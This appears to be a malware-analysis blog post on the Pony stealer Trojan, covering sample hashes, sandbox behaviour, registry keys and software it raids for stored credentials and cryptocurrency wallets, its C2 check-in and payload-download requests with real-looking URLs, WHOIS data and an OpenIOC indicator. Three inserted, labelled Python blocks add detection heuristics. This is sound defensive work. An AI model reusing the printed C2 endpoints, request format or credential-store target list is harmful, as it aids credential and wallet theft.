Pony is a stealer Trojan and has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins (https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/). In this post we will cover the reversing of the Pony Trojan, starting with its dynamic analysis.

Tools required

  1. VMware
  2. IDA Disassembler
  3. OllyDbg Debugger
  4. Hex editor

First, we will examine its dynamic analysis behavior.

FILE NAME tt2.exe
FILE SIZE 209408 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 6245899b11a6bd6769b3656943322d13
SHA1 9879565d8c82e356cb7da62b9f04c3707cd3aac8
SHA256 15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1
SHA512 1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080
CRC32 906EA658
SSDEEP 3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D
YARA None matched

Running it through Cuckoo, we get the following basic details about it:

We now have an initial idea of what the malware is doing. It can be summarized as:

  1. Generates network traffic (connects out to its command and control server).
  2. Has an anti-sandbox feature (based on a time difference check).
  3. Hooks into and reads browser data.
  4. Hides itself in an NTFS alternate data stream (ADS).

Let us look at some of the registry keys it modifies or reads:

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar
HKEY_CURRENT_USER\Software\FlashFXP\3
HKEY_CURRENT_USER\Software\FlashFXP
HKEY_CURRENT_USER\Software\FlashFXP\4
HKEY_LOCAL_MACHINE\Software\FlashFXP\3
HKEY_LOCAL_MACHINE\Software\FlashFXP
HKEY_LOCAL_MACHINE\Software\FlashFXP\4
HKEY_CURRENT_USER\Software\FileZilla
HKEY_CURRENT_USER\Software\FileZilla Client
HKEY_LOCAL_MACHINE\Software\FileZilla
HKEY_LOCAL_MACHINE\Software\FileZilla Client
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options
HKEY_CURRENT_USER\Software\BPFTP
HKEY_CURRENT_USER\Software\TurboFTP
HKEY_LOCAL_MACHINE\Software\TurboFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP\Options
HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites
HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher
HKEY_CURRENT_USER\Software\ExpanDrive\Sessions
HKEY_CURRENT_USER\Software\ExpanDrive
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\FTPClient\Sites
HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites
HKEY_CURRENT_USER\SOFTWARE\LeapWare
HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections
HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections

From these keys it is evident that it is looking for stored credentials (the keys belong to FTP clients that save site passwords). Apart from stored credentials, it also steals Bitcoin and other cryptocurrency wallets. Following is the list of software it tries to steal from:

| Targeted software | | |
|---|---|---|
| AR Manager | FTPGetter | Pocomail |
| Total Commander | ALFTP | IncrediMail |
| WS_FTP | Internet Explorer | The Bat! |
| CuteFTP | Dreamweaver | Outlook |
| FlashFXP | DeluxeFTP | Thunderbird |
| FileZilla | Google Chrome | FastTrackFTP |
| FTP Commander | Chromium / SRWare Iron | Bitcoin |
| BulletProof FTP | ChromePlus | Electrum |
| SmartFTP | Bromium (Yandex Chrome) | MultiBit |
| TurboFTP | Nichrome | FTP Disk |
| FFFTP | Comodo Dragon | Litecoin |
| CoffeeCup FTP / Sitemapper | RockMelt | Namecoin |
| CoreFTP | K-Meleon | Terracoin |
| FTP Explorer | Epic | Bitcoin Armory |
| Frigate3 FTP | Staff-FTP | PPCoin (Peercoin) |
| SecureFX | AceFTP | Primecoin |
| UltraFXP | Global Downloader | Feathercoin |
| FTPRush | FreshFTP | NovaCoin |
| WebSitePublisher | BlazeFTP | Freicoin |
| BitKinex | NETFile | Devcoin |
| ExpanDrive | GoFTP | Frankocoin |
| ClassicFTP | 3D-FTP | ProtoShares |
| Fling | Easy FTP | MegaCoin |
| SoftX | Xftp | Quarkcoin |
| Directory Opus | FTP Now | Worldcoin |
| FreeFTP / DirectFTP | Robo-FTP | Infinitecoin |
| LeapFTP | LinasFTP | Ixcoin |
| WinSCP | Cyberduck | Anoncoin |
| 32bit FTP | Putty | BBQcoin |
| NetDrive | Notepad++ | Digitalcoin |
| WebDrive | CoffeeCup Visual Site Designer | Mincoin |
| FTP Control | FTPShell | Goldcoin |
| Opera | FTPInfo | Yacoin |
| WiseFTP | NexusFile | Zetacoin |
| FTP Voyager | FastStone Browser | Fastcoin |
| Firefox | CoolNovo | I0coin |
| FireFTP | WinZip | Tagcoin |
| SeaMonkey | Yandex.Internet / Ya.Browser | Bytecoin |
| Flock | MyFTP | Florincoin |
| Mozilla | sherrod FTP | Phoenixcoin |
| LeechFTP | NovaFTP | Luckycoin |
| Odin Secure FTP Expert | Windows Mail | Craftcoin |
| WinFTP | Windows Live Mail | Junkcoin |
| FTP Surfer | Becky! | |
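A triage check built from the registry keys listed above. This is an added example, not code from the original post: it scans a file image for the credential-store paths Pony queries, in both ASCII and UTF-16LE, and flags a binary that references many unrelated vendors at once. The path subset, the threshold and the sample blob are constructed for the example.

```python
# Constructed subset of the credential-store registry paths Pony queries
# (from the Cuckoo output above); matched case-insensitively.
PONY_REG_PATHS = [
    r"Software\GlobalSCAPE\CuteFTP",
    r"Software\FlashFXP",
    r"Software\FileZilla",
    r"Software\BPFTP\Bullet Proof FTP",
    r"Software\TurboFTP",
    r"Software\Sota\FFFTP",
    r"Software\FTPWare\COREFTP\Sites",
    r"Software\VanDyke\SecureFX",
    r"Software\ExpanDrive\Sessions",
    r"Software\NCH Software\ClassicFTP\FTPAccounts",
    r"Software\SoftX.org\FTPClient\Sites",
    r"Software\Martin Prikryl",
    r"Software\South River Technologies\WebDrive\Connections",
]


def find_credential_store_paths(data):
    """Return {path: [encodings]} for each target path present in data.
    Both ASCII and UTF-16LE are checked because Windows binaries usually
    hold such strings as wide characters (the YARA 'ascii wide' idiom)."""
    hits = {}
    lowered = data.lower()          # bytes.lower() only touches A-Z, so it
    for path in PONY_REG_PATHS:     # is safe on UTF-16LE text as well
        found = []
        if path.lower().encode("ascii") in lowered:
            found.append("ascii")
        if path.lower().encode("utf-16-le") in lowered:
            found.append("wide")
        if found:
            hits[path] = found
    return hits


def looks_like_ftp_stealer(data, threshold=5):
    """Triage heuristic: one vendor's path is normal for a legitimate FTP
    client; many different vendors' paths in one binary is the stealer pattern."""
    return len(find_credential_store_paths(data)) >= threshold


# Constructed sample blob: five target paths, mixed ASCII and wide, in junk.
SAMPLE = (b"MZ\x90\x00" + b"\xcc" * 16
          + b"Software\\FlashFXP\\4\x00"
          + "SOFTWARE\\FileZilla Client".encode("utf-16-le") + b"\x00\x00"
          + "Software\\Martin Prikryl".encode("utf-16-le") + b"\x00\x00"
          + b"Software\\TurboFTP\x00"
          + b"Software\\VanDyke\\SecureFX\x00"
          + b"\xcc" * 16)
```

Run it over an unpacked sample (`open(path, "rb").read()`); a packed Pony binary will only show these strings after it has been dumped from memory.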

It copies itself onto the system under an integer-named file, which is executed through a chain of ShellExecuteEx calls.

FILE NAME 31780534.exe
FILE SIZE 317440 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 2bd7a3cc81ae70b16b2a85008fb7dd81
SHA1 7bf35f051a44dc31f0b138e1874e1d75745d49b3
SHA256 57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856
CRC32 4AA8F5BD
SSDEEP 6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M
YARA None matched

Not only does Pony steal information, it also downloads other malware; the download URLs are hardcoded in the binary itself.

http://titratresfi.ru/gate.php
POST /gate.php HTTP/1.0
Host: titratresfi.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 270
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http://adishma.com/media/system/shost.exe
GET /media/system/shost.exe HTTP/1.0
Host: adishma.com
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Now let’s look at the network traffic it has generated.


It sends basic information to the command and control server, which we are going to examine deeply in the second post.
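For a defender watching proxy or IDS logs, the check-in above has several traits worth keying on together. This is an added example, not code from the original post: it parses the two raw requests shown above (reconstructed here with CRLF line endings) and lists which Pony traits each one carries, so the payload download is not mistaken for the C2 beacon.

```python
# Added example, not from the original post: parse the raw check-in and
# download requests captured above and list the Pony traits each carries.
PONY_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; "
           ".NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)")

# Reconstructed from the two requests shown on the page (CRLF line endings).
CHECKIN = ("POST /gate.php HTTP/1.0\r\nHost: titratresfi.ru\r\nAccept: */*\r\n"
           "Accept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\n"
           "Content-Length: 270\r\nContent-Type: application/octet-stream\r\n"
           "Connection: close\r\nContent-Encoding: binary\r\n"
           "User-Agent: " + PONY_UA + "\r\n\r\n" + "\x00" * 270)
DOWNLOAD = ("GET /media/system/shost.exe HTTP/1.0\r\nHost: adishma.com\r\n"
            "Accept-Language: en-US\r\nAccept: */*\r\n"
            "Accept-Encoding: identity, *;q=0\r\nConnection: close\r\n"
            "User-Agent: " + PONY_UA + "\r\n\r\n")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, version, headers)."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, _, header_text = head.partition("\r\n")
    method, path, version = request_line.split()
    headers = {}
    for line in header_text.split("\r\n"):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def pony_checkin_traits(raw):
    """Traits of the Pony /gate.php check-in present in one request."""
    method, path, version, h = parse_request(raw)
    traits = []
    if method == "POST" and path.endswith("/gate.php"):
        traits.append("POST to gate.php")
    if version == "HTTP/1.0":
        traits.append("HTTP/1.0 request")
    if h.get("content-type") == "application/octet-stream":
        traits.append("opaque binary body")
    if h.get("content-encoding") == "binary":
        traits.append("non-standard Content-Encoding: binary")
    if h.get("user-agent") == PONY_UA:
        traits.append("hard-coded IE6 user agent")
    return traits


def is_pony_checkin(raw, min_traits=4):
    """The UA and HTTP/1.0 alone also appear on the payload download;
    require most traits before calling a request a check-in."""
    return len(pony_checkin_traits(raw)) >= min_traits
```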

Network information

domain: TITRATRESFI.RU
nserver: ns1.entrydns.net.
nserver: ns2.entrydns.net.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: R01-RU
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2015.11.09
paid-till: 2016.11.09
free-date: 2016.12.10
source: TCI
Last updated on 2015.11.15 16:16:33 MSK

Domain Name: ADISHMA.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: NS1.SOFTONETECHNOLOGIES.COM
Name Server: NS2.SOFTONETECHNOLOGIES.COM
Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Updated Date: 07-sep-2015
Creation Date: 26-dec-2014
Expiration Date: 26-dec-2015

IOC

<Indicator id="aae1b2d0-a5ad-471a-8c48-2296f6cfb49e" operator="OR">
  <IndicatorItem condition="is" id="b1984833-80fe-446b-a3d8-3349822f6336">
    <Context document="FileItem" search="FileItem/Md5sum" type="mir"/>
    <Content type="md5">6245899b11a6bd6769b3656943322d13</Content>
  </IndicatorItem>
  <IndicatorItem condition="is" id="e2168e97-5db8-4432-b498-8a5973deeb42">
    <Context document="FileItem" search="FileItem/Sha1sum" type="mir"/>
    <Content type="sha1">9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content>
  </IndicatorItem>
  <IndicatorItem condition="is" id="f66fb3f0-1178-4638-bf06-24d131cfd2c7">
    <Context document="FileItem" search="FileItem/Sha256sum" type="mir"/>
    <Content type="sha256">15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>
  </IndicatorItem>
  <Indicator id="81c75ab7-69b2-434d-808f-607a5b283cec" operator="AND">
    <IndicatorItem condition="is" id="bb45ed4b-823c-41d0-8831-0ab41c874a7f">
      <Context document="FileItem" search="FileItem/FileName" type="mir"/>
      <Content type="string">Centrylink</Content>
    </IndicatorItem>
    <IndicatorItem condition="is" id="9194b695-6af4-428f-b2cf-3a40c2560e78">
      <Context document="FileItem" search="FileItem/SizeInBytes" type="mir"/>
      <Content type="int">209408</Content>
    </IndicatorItem>
    <IndicatorItem condition="is" id="010608b2-0016-426d-9dce-2e9ad855f786">
      <Context document="FileItem" search="FileItem/PEInfo/PETimeStamp" type="mir"/>
      <Content type="date">2015-11-12T09:49:00Z</Content>
    </IndicatorItem>
  </Indicator>
</Indicator>
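The OpenIOC fragment above is a small logic tree: the outer OR fires on any known hash, and the nested AND fires only when file name, size and PE timestamp all agree, so a renamed or repacked sample is still caught by one branch or the other. The evaluator below is an added example, not code from the original post; it embeds a trimmed, constructed copy of the IOC (ids dropped, timestamp item omitted, values the post's own) and tests it against observed FileItem attributes.

```python
import xml.etree.ElementTree as ET

# Constructed, trimmed copy of the OpenIOC fragment above (ids dropped and
# the PETimeStamp item omitted for brevity); hash, name and size are the post's.
IOC_XML = """<Indicator operator="OR">
  <IndicatorItem condition="is">
    <Context document="FileItem" search="FileItem/Md5sum" type="mir"/>
    <Content type="md5">6245899b11a6bd6769b3656943322d13</Content>
  </IndicatorItem>
  <Indicator operator="AND">
    <IndicatorItem condition="is">
      <Context document="FileItem" search="FileItem/FileName" type="mir"/>
      <Content type="string">Centrylink</Content>
    </IndicatorItem>
    <IndicatorItem condition="is">
      <Context document="FileItem" search="FileItem/SizeInBytes" type="mir"/>
      <Content type="int">209408</Content>
    </IndicatorItem>
  </Indicator>
</Indicator>"""


def item_matches(item, observed):
    """Evaluate one IndicatorItem against observed FileItem attributes."""
    search = item.find("Context").get("search")          # e.g. FileItem/Md5sum
    content = item.find("Content")
    expected = content.text.strip()
    actual = observed.get(search.split("/", 1)[1])      # key after "FileItem/"
    if actual is None:
        return False
    if content.get("type") == "int":
        return int(actual) == int(expected)
    cond = item.get("condition")
    if cond == "is":
        return str(actual).lower() == expected.lower()
    if cond == "contains":
        return expected.lower() in str(actual).lower()
    return False


def indicator_matches(indicator, observed):
    """Combine children with the Indicator's operator; nesting is recursive."""
    results = [item_matches(c, observed) if c.tag == "IndicatorItem"
               else indicator_matches(c, observed) for c in indicator]
    return any(results) if indicator.get("operator") == "OR" else all(results)


def evaluate(ioc_xml, observed):
    """True when the observed file attributes satisfy the IOC logic tree."""
    return indicator_matches(ET.fromstring(ioc_xml), observed)
```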

Using VirusTotal (VT) we are able to map other files that use the same location for downloading additional malware.